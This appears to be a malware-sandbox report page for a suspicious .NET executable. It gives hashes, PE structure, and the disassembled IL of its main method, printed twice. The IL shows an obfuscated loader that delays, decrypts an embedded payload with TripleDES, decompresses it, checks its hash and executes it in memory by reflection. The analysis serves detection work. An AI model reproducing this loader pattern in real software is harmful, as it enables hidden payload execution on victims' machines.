Suspicious
Suspect

5c2fc067a621520684b39802c9900ee8

PE Executable
|
MD5: 5c2fc067a621520684b39802c9900ee8
|
Size: 1.08 MB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Medium

Hash
Hash Value
MD5
5c2fc067a621520684b39802c9900ee8
Sha1
85d0ce793229e793d88b82f16f835c922d14af06
Sha256
f835e92eb109331beb56cd269bd2f6cc7998cee93511c3fe2976fe29005dc2c2
Sha384
0041d4298f47ca83977965b474f74a103e0371ff67542525c477edd2e681047a0d6f2fe2c42384313db1fb26c3e4d38a
Sha512
ffac7ee9d14544991a3c35d399f774b6f4bd2ceff4b7ca99c5ef84bcab0cdacd49dd57b42ac49c6b80cacf170ae1ca9435fff2d4fc32300ca427edf26c73c970
SSDeep
24576:qGdRy0CdkC2b6LSE2p6cCfJfS0JrvFJlj2O:qGLoyC2b6LSCD1F3j2O
TLSH
083523119EA5BDB9E93B983D77634D223B2272067C762315EF90FE0529E4AD8913C7C0

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Informations
Name
Value
Info

PE Detect: PeReader OK (file layout)

Module Name

PedestrianCompactAssessments.exe

Full Name

PedestrianCompactAssessments.exe

EntryPoint

System.Void ProtectedWeaknessDistricts.StrollerQualifierUpdates::AnotherSphericalTherapist(System.String[])

Scope Name

PedestrianCompactAssessments.exe

Scope Type

ModuleDef

Kind

Windows

Runtime Version

v4.0.30319

Tables Header Version

512

WinMD Version

<null>

Assembly Name

PedestrianCompactAssessments

Assembly Version

3.6.3.0

Assembly Culture

<null>

Has PublicKey

False

PublicKey Token

<null>

Target Framework

<null>

Total Strings

0

Main Method

System.Void ProtectedWeaknessDistricts.StrollerQualifierUpdates::AnotherSphericalTherapist(System.String[])

Main IL Instruction Count

177

Main IL

call System.Int32 ProtectedWeaknessDistricts.StrollerQualifierUpdates::DisturbancesClassifiedMidnight() call System.Void System.Threading.Thread::Sleep(System.Int32) call System.Int32 System.Environment::get_TickCount() stloc V_0 ldloc V_0 ldloc V_0 xor <null> stloc V_0 call System.Int32 ProtectedWeaknessDistricts.StrollerQualifierUpdates::MagazineDifficultiesGuarantee() newarr System.Byte dup <null> ldtoken DirectorateSwingersCommunicator.ImplementedStatisticPredicting/__StaticArrayInitTypeSize=1071472 DirectorateSwingersCommunicator.ImplementedStatisticPredicting::CiviliansCachingNutritional call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc V_1 call System.Int32 ProtectedWeaknessDistricts.StrollerQualifierUpdates::AirportRetreatsRighteous() newarr System.Byte dup <null> ldtoken DirectorateSwingersCommunicator.ImplementedStatisticPredicting/__StaticArrayInitTypeSize=16 DirectorateSwingersCommunicator.ImplementedStatisticPredicting::FortunePreludeBollywood call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc V_2 call System.Int32 ProtectedWeaknessDistricts.StrollerQualifierUpdates::AlexandraInterruptedFreelists() newarr System.Byte dup <null> ldtoken DirectorateSwingersCommunicator.ImplementedStatisticPredicting/__StaticArrayInitTypeSize=32 DirectorateSwingersCommunicator.ImplementedStatisticPredicting::SpencerScreensaversCompare call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc V_3 newobj System.Void System.Security.Cryptography.TripleDESCryptoServiceProvider::.ctor() stloc V_5 ldloc V_5 ldloc V_2 callvirt System.Void System.Security.Cryptography.SymmetricAlgorithm::set_Key(System.Byte[]) ldloc V_5 call System.Int32 ProtectedWeaknessDistricts.StrollerQualifierUpdates::AdaptorsGrievanceAugustine() callvirt System.Void System.Security.Cryptography.SymmetricAlgorithm::set_Mode(System.Security.Cryptography.CipherMode) ldloc V_5 call System.Int32 ProtectedWeaknessDistricts.StrollerQualifierUpdates::PointlessExcellentFragmentation() callvirt System.Void System.Security.Cryptography.SymmetricAlgorithm::set_Padding(System.Security.Cryptography.PaddingMode) ldloc V_5 callvirt System.Security.Cryptography.ICryptoTransform System.Security.Cryptography.SymmetricAlgorithm::CreateDecryptor() stloc V_6 ldloc V_6 ldloc V_1 call System.Int32 ProtectedWeaknessDistricts.StrollerQualifierUpdates::DraggedCrimsonInappropriate() ldloc V_1 ldlen <null> conv.i4 <null> callvirt System.Byte[] System.Security.Cryptography.ICryptoTransform::TransformFinalBlock(System.Byte[],System.Int32,System.Int32) stloc V_4 leave IL_00DE: leave IL_00F6 ldloc V_6 brfalse IL_00DD: endfinally ldloc V_6 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave IL_00F6: ldloc V_4 ldloc V_5 brfalse IL_00F5: endfinally ldloc V_5 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc V_4 newobj System.Void System.IO.MemoryStream::.ctor(System.Byte[]) stloc V_8 ldloc V_8 call System.Int32 ProtectedWeaknessDistricts.StrollerQualifierUpdates::ConsideringTournamentChandler() newobj System.Void System.IO.Compression.GZipStream::.ctor(System.IO.Stream,System.IO.Compression.CompressionMode) stloc V_9 newobj System.Void System.IO.MemoryStream::.ctor() stloc V_10 ldloc V_9 ldloc V_10 callvirt System.Void System.IO.Stream::CopyTo(System.IO.Stream) ldloc V_10 callvirt System.Byte[] System.IO.MemoryStream::ToArray() stloc V_7 leave IL_0150: leave IL_0168 ldloc V_10 brfalse IL_014F: endfinally ldloc V_10 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave IL_0168: leave IL_0180 ldloc V_9 brfalse IL_0167: endfinally ldloc V_9 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave IL_0180: newobj System.Void System.Security.Cryptography.SHA256CryptoServiceProvider::.ctor() ldloc V_8 brfalse IL_017F: endfinally ldloc V_8 callvirt System.Void System.IDisposable::Dispose() endfinally <null> newobj System.Void System.Security.Cryptography.SHA256CryptoServiceProvider::.ctor() stloc V_12 ldloc V_12 ldloc V_7 callvirt System.Byte[] System.Security.Cryptography.HashAlgorithm::ComputeHash(System.Byte[]) stloc V_11 leave IL_01B2: call System.Int32 ProtectedWeaknessDistricts.StrollerQualifierUpdates::GreetingBloggersQuicker() ldloc V_12 brfalse IL_01B1: endfinally ldloc V_12 callvirt System.Void System.IDisposable::Dispose() endfinally <null> call System.Int32 ProtectedWeaknessDistricts.StrollerQualifierUpdates::GreetingBloggersQuicker() stloc V_13 ldloc V_11 ldlen <null> conv.i4 <null> ldloc V_3 ldlen <null> conv.i4 <null> bne.un IL_0221: call System.Int32 ProtectedWeaknessDistricts.StrollerQualifierUpdates::NeglectEverythingFreezing() call System.Int32 ProtectedWeaknessDistricts.StrollerQualifierUpdates::PregnantBullyingMarvelous() stloc V_14 br IL_020D: ldloc V_14 ldloc V_11 ldloc V_14 ldelem.u1 <null> ldloc V_3 ldloc V_14 ldelem.u1 <null> beq IL_01FF: ldloc V_14 call System.Int32 ProtectedWeaknessDistricts.StrollerQualifierUpdates::UtterlyGroundedEnquiry() stloc V_13 br IL_022A: ldloc V_13 ldloc V_14 call System.Int32 ProtectedWeaknessDistricts.StrollerQualifierUpdates::PiratesNicolasLeasing() add <null> stloc V_14 ldloc V_14 ldloc V_11 ldlen <null> conv.i4 <null> blt IL_01DA: ldloc V_11 br IL_022A: ldloc V_13 call System.Int32 ProtectedWeaknessDistricts.StrollerQualifierUpdates::NeglectEverythingFreezing() stloc V_13 ldloc V_13 brtrue IL_023D: ldloc V_7 call System.Int32 ProtectedWeaknessDistricts.StrollerQualifierUpdates::CertainHypertextMegapixels() call System.Void System.Environment::Exit(System.Int32) ldloc V_7 call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) stloc V_15 ldloc V_15 callvirt System.Reflection.MethodInfo System.Reflection.Assembly::get_EntryPoint() stloc V_16 ldnull <null> stloc V_17 ldloc V_16 callvirt System.Reflection.ParameterInfo[] System.Reflection.MethodBase::GetParameters() ldlen <null> conv.i4 <null> call System.Int32 ProtectedWeaknessDistricts.StrollerQualifierUpdates::CountrywideLiechtensteinUtilizing() bne.un IL_0295: ldloc V_16 call System.Int32 ProtectedWeaknessDistricts.StrollerQualifierUpdates::VanderbiltBatteriesPsychiatry() newarr System.Object stloc V_18 ldloc V_18 call System.Int32 ProtectedWeaknessDistricts.StrollerQualifierUpdates::HangingHypotheticalComoros() ldarg BrentwoodSpecificallyThroughout stelem.ref <null> ldloc V_18 stloc V_17 ldloc V_16 ldnull <null> ldloc V_17 callvirt System.Object System.Reflection.MethodBase::Invoke(System.Object,System.Object[]) pop <null> leave IL_02B9: ret pop <null> call System.Int32 ProtectedWeaknessDistricts.StrollerQualifierUpdates::PlaceboAggregateInfluencing() call System.Void System.Environment::Exit(System.Int32) leave IL_02B9: ret ret <null>

Module Name

PedestrianCompactAssessments.exe

Full Name

PedestrianCompactAssessments.exe

EntryPoint

System.Void ProtectedWeaknessDistricts.StrollerQualifierUpdates::AnotherSphericalTherapist(System.String[])

Scope Name

PedestrianCompactAssessments.exe

Scope Type

ModuleDef

Kind

Windows

Runtime Version

v4.0.30319

Tables Header Version

512

WinMD Version

<null>

Assembly Name

PedestrianCompactAssessments

Assembly Version

3.6.3.0

Assembly Culture

<null>

Has PublicKey

False

PublicKey Token

<null>

Target Framework

<null>

Total Strings

0

Main Method

System.Void ProtectedWeaknessDistricts.StrollerQualifierUpdates::AnotherSphericalTherapist(System.String[])

Main IL Instruction Count

177

Main IL

call System.Int32 ProtectedWeaknessDistricts.StrollerQualifierUpdates::DisturbancesClassifiedMidnight() call System.Void System.Threading.Thread::Sleep(System.Int32) call System.Int32 System.Environment::get_TickCount() stloc V_0 ldloc V_0 ldloc V_0 xor <null> stloc V_0 call System.Int32 ProtectedWeaknessDistricts.StrollerQualifierUpdates::MagazineDifficultiesGuarantee() newarr System.Byte dup <null> ldtoken DirectorateSwingersCommunicator.ImplementedStatisticPredicting/__StaticArrayInitTypeSize=1071472 DirectorateSwingersCommunicator.ImplementedStatisticPredicting::CiviliansCachingNutritional call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc V_1 call System.Int32 ProtectedWeaknessDistricts.StrollerQualifierUpdates::AirportRetreatsRighteous() newarr System.Byte dup <null> ldtoken DirectorateSwingersCommunicator.ImplementedStatisticPredicting/__StaticArrayInitTypeSize=16 DirectorateSwingersCommunicator.ImplementedStatisticPredicting::FortunePreludeBollywood call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc V_2 call System.Int32 ProtectedWeaknessDistricts.StrollerQualifierUpdates::AlexandraInterruptedFreelists() newarr System.Byte dup <null> ldtoken DirectorateSwingersCommunicator.ImplementedStatisticPredicting/__StaticArrayInitTypeSize=32 DirectorateSwingersCommunicator.ImplementedStatisticPredicting::SpencerScreensaversCompare call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc V_3 newobj System.Void System.Security.Cryptography.TripleDESCryptoServiceProvider::.ctor() stloc V_5 ldloc V_5 ldloc V_2 callvirt System.Void System.Security.Cryptography.SymmetricAlgorithm::set_Key(System.Byte[]) ldloc V_5 call System.Int32 ProtectedWeaknessDistricts.StrollerQualifierUpdates::AdaptorsGrievanceAugustine() callvirt System.Void System.Security.Cryptography.SymmetricAlgorithm::set_Mode(System.Security.Cryptography.CipherMode) ldloc V_5 call System.Int32 ProtectedWeaknessDistricts.StrollerQualifierUpdates::PointlessExcellentFragmentation() callvirt System.Void System.Security.Cryptography.SymmetricAlgorithm::set_Padding(System.Security.Cryptography.PaddingMode) ldloc V_5 callvirt System.Security.Cryptography.ICryptoTransform System.Security.Cryptography.SymmetricAlgorithm::CreateDecryptor() stloc V_6 ldloc V_6 ldloc V_1 call System.Int32 ProtectedWeaknessDistricts.StrollerQualifierUpdates::DraggedCrimsonInappropriate() ldloc V_1 ldlen <null> conv.i4 <null> callvirt System.Byte[] System.Security.Cryptography.ICryptoTransform::TransformFinalBlock(System.Byte[],System.Int32,System.Int32) stloc V_4 leave IL_00DE: leave IL_00F6 ldloc V_6 brfalse IL_00DD: endfinally ldloc V_6 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave IL_00F6: ldloc V_4 ldloc V_5 brfalse IL_00F5: endfinally ldloc V_5 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc V_4 newobj System.Void System.IO.MemoryStream::.ctor(System.Byte[]) stloc V_8 ldloc V_8 call System.Int32 ProtectedWeaknessDistricts.StrollerQualifierUpdates::ConsideringTournamentChandler() newobj System.Void System.IO.Compression.GZipStream::.ctor(System.IO.Stream,System.IO.Compression.CompressionMode) stloc V_9 newobj System.Void System.IO.MemoryStream::.ctor() stloc V_10 ldloc V_9 ldloc V_10 callvirt System.Void System.IO.Stream::CopyTo(System.IO.Stream) ldloc V_10 callvirt System.Byte[] System.IO.MemoryStream::ToArray() stloc V_7 leave IL_0150: leave IL_0168 ldloc V_10 brfalse IL_014F: endfinally ldloc V_10 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave IL_0168: leave IL_0180 ldloc V_9 brfalse IL_0167: endfinally ldloc V_9 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave IL_0180: newobj System.Void System.Security.Cryptography.SHA256CryptoServiceProvider::.ctor() ldloc V_8 brfalse IL_017F: endfinally ldloc V_8 callvirt System.Void System.IDisposable::Dispose() endfinally <null> newobj System.Void System.Security.Cryptography.SHA256CryptoServiceProvider::.ctor() stloc V_12 ldloc V_12 ldloc V_7 callvirt System.Byte[] System.Security.Cryptography.HashAlgorithm::ComputeHash(System.Byte[]) stloc V_11 leave IL_01B2: call System.Int32 ProtectedWeaknessDistricts.StrollerQualifierUpdates::GreetingBloggersQuicker() ldloc V_12 brfalse IL_01B1: endfinally ldloc V_12 callvirt System.Void System.IDisposable::Dispose() endfinally <null> call System.Int32 ProtectedWeaknessDistricts.StrollerQualifierUpdates::GreetingBloggersQuicker() stloc V_13 ldloc V_11 ldlen <null> conv.i4 <null> ldloc V_3 ldlen <null> conv.i4 <null> bne.un IL_0221: call System.Int32 ProtectedWeaknessDistricts.StrollerQualifierUpdates::NeglectEverythingFreezing() call System.Int32 ProtectedWeaknessDistricts.StrollerQualifierUpdates::PregnantBullyingMarvelous() stloc V_14 br IL_020D: ldloc V_14 ldloc V_11 ldloc V_14 ldelem.u1 <null> ldloc V_3 ldloc V_14 ldelem.u1 <null> beq IL_01FF: ldloc V_14 call System.Int32 ProtectedWeaknessDistricts.StrollerQualifierUpdates::UtterlyGroundedEnquiry() stloc V_13 br IL_022A: ldloc V_13 ldloc V_14 call System.Int32 ProtectedWeaknessDistricts.StrollerQualifierUpdates::PiratesNicolasLeasing() add <null> stloc V_14 ldloc V_14 ldloc V_11 ldlen <null> conv.i4 <null> blt IL_01DA: ldloc V_11 br IL_022A: ldloc V_13 call System.Int32 ProtectedWeaknessDistricts.StrollerQualifierUpdates::NeglectEverythingFreezing() stloc V_13 ldloc V_13 brtrue IL_023D: ldloc V_7 call System.Int32 ProtectedWeaknessDistricts.StrollerQualifierUpdates::CertainHypertextMegapixels() call System.Void System.Environment::Exit(System.Int32) ldloc V_7 call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) stloc V_15 ldloc V_15 callvirt System.Reflection.MethodInfo System.Reflection.Assembly::get_EntryPoint() stloc V_16 ldnull <null> stloc V_17 ldloc V_16 callvirt System.Reflection.ParameterInfo[] System.Reflection.MethodBase::GetParameters() ldlen <null> conv.i4 <null> call System.Int32 ProtectedWeaknessDistricts.StrollerQualifierUpdates::CountrywideLiechtensteinUtilizing() bne.un IL_0295: ldloc V_16 call System.Int32 ProtectedWeaknessDistricts.StrollerQualifierUpdates::VanderbiltBatteriesPsychiatry() newarr System.Object stloc V_18 ldloc V_18 call System.Int32 ProtectedWeaknessDistricts.StrollerQualifierUpdates::HangingHypotheticalComoros() ldarg BrentwoodSpecificallyThroughout stelem.ref <null> ldloc V_18 stloc V_17 ldloc V_16 ldnull <null> ldloc V_17 callvirt System.Object System.Reflection.MethodBase::Invoke(System.Object,System.Object[]) pop <null> leave IL_02B9: ret pop <null> call System.Int32 ProtectedWeaknessDistricts.StrollerQualifierUpdates::PlaceboAggregateInfluencing() call System.Void System.Environment::Exit(System.Int32) leave IL_02B9: ret ret <null>

5c2fc067a621520684b39802c9900ee8 (1.08 MB)
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙